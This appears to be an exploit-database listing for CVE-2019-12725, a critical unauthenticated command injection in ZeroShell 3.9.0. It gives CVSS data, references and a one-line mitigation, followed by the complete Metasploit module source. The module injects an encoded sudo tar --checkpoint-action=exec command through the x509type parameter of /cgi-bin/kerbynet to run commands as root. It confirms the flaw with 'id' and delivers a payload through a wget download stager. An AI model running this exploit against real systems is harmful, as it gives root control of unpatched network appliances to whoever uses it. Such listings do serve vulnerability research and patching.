header-logo
Suggest Exploit
vendor:
ZeroShell
by:
Juan Manuel Fernandez, Giuseppe Fuggiano
9.8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: ZeroShell
Affected Version From: 3.9.2000
Affected Version To: 3.9.2000
Patch Exists: YES
Related CWE: CVE-2019-12725
CPE: a:zeroshell:zeroshell:3.9.0
Metasploit:
Other Scripts:
Tags: packetstorm,cve,cve2019,rce,zeroshell
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://www.zeroshell.org/new-release-and-critical-vulnerability/https://www.tarlogic.com/advisories/zeroshell-rce-root.txthttps://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.pyhttps://zeroshell.org/blog/http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html
Nuclei Metadata: {'max-request': 1, 'vendor': 'zeroshell', 'product': 'zeroshell'}
Platforms Tested: Unix, Linux
2019

Zeroshell 3.9.0 Remote Command Execution

This module exploits an unauthenticated command injection vulnerability found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. As sudo is configured to execute /bin/tar without a password (NOPASSWD) it is possible to run root commands using the "checkpoint" tar options.

Mitigation:

Update to the latest version of ZeroShell
Source

Exploit-DB raw data:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability 
        found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. 
        As sudo is configured to execute /bin/tar without a password (NOPASSWD)
        it is possible to run root commands using the "checkpoint" tar options.
      },
      'Author'         => [
        'Juan Manuel Fernandez', # Vulnerability discovery
        'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-12725'],
        ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
        ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
      ],
      'DisclosureDate' => 'Jul 17 2019',
      'License'        => MSF_LICENSE,
      'Privileged'     => true, 
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'Targets'        => [
       ['Zeroshell 3.9.0 (x86)', {
         'Platform'    => 'linux',
         'Arch'        => ARCH_X86,
        }],
      ],
      'DefaultTarget'  => 0,
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ])
  end

  def execute_command(cmd, opts = {})
    command_payload  = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"

    print_status("Sending stager payload...")

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/kerbynet',
      'encode_params' => false,
      'vars_get' => {
        'Action' => 'x509view',
        'Section' => 'NoAuthREQ',
        'User' => '',
        'x509type' => command_payload
      }
    )

    return res
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
    return cmd
  end

  def check
    res = execute_command('id')
    if res && res.body.include?("uid=0(root)")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 5)
  end

end

Navigation

Suggest Exploit

Services By CQR